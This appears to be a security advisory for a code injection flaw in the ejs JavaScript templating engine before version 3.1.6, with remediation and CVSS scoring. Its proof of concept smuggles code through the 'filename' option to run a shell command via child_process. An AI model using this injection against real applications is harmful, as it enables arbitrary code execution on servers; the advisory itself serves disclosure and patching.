Arbitrary Code Injection

Affecting ejs package, versions <3.1.6

Report new vulnerabilities
Do your applications use this vulnerable package? Test your applications

Overview

ejs is a popular JavaScript templating engine.

Affected versions of this package are vulnerable to Arbitrary Code Injection via the render and renderFile. If external input is flowing into the options parameter, an attacker is able run arbitrary code. This include the filename, compileDebug, and client option.

POC

let ejs = require('ejs')
ejs.render('./views/test.ejs',{
    filename:'/etc/passwd\nfinally { this.global.process.mainModule.require(\'child_process\').execSync(\'touch EJS_HACKED\') }',
    compileDebug: true,
    message: 'test',
    client: true
})

Remediation

Upgrade ejs to version 3.1.6 or higher.

References

CVSS Score

4.1
medium severity
  • Attack Vector
    Network
  • Attack Complexity
    High
  • Privileges Required
    High
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    Low
  • Integrity
    Low
  • Availability
    Low
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L/E:P/RL:U/RC:C
Credit
fangzequn
CWE
CWE-94
Snyk ID
SNYK-JS-EJS-1049328
Disclosed
09 Dec, 2020
Published
20 Jan, 2021